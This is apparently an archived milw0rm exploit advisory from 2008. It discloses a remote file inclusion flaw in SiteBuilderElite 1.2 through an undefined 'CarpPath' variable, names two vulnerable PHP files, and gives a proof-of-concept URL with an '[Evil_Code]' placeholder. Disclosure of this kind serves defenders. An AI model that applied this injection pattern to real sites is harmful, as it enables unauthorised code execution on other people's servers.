26 lines
No EOL
1,012 B
Text
26 lines
No EOL
1,012 B
Text
--==+================================================================================+==--
|
|
--==+ SiteBuilderElite1.2 Multiple Remote File Inclusion +==--
|
|
--==+================================================================================+==--
|
|
|
|
Author: MhZ91
|
|
Title: SiteBuilderElite1.2 Multiple Remote File Inclusion
|
|
Vendor: http://sitebuilderelite.com $97
|
|
Bug: Multiple Remote File Inclusion
|
|
Info: "Boost Your Adsense And Affiliate Commissions By Building 10s, 100s or 1,000s of Websites, Each With The Click of a Button!"
|
|
Visit: http://www.inj3ct-it.org
|
|
|
|
[*]----------------------------------------------------------
|
|
|
|
SiteBuilderElite1.2 present a variable "CarpPath" not definited in this file
|
|
|
|
files/carprss.php
|
|
files/amazon-bestsellers.php
|
|
|
|
all are exploitable by the variable "CarpPath" for example
|
|
|
|
http://www.example.com/files/carprss.php?CarpPath=[Evil_Code]
|
|
|
|
|
|
[*]----------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-02-28] |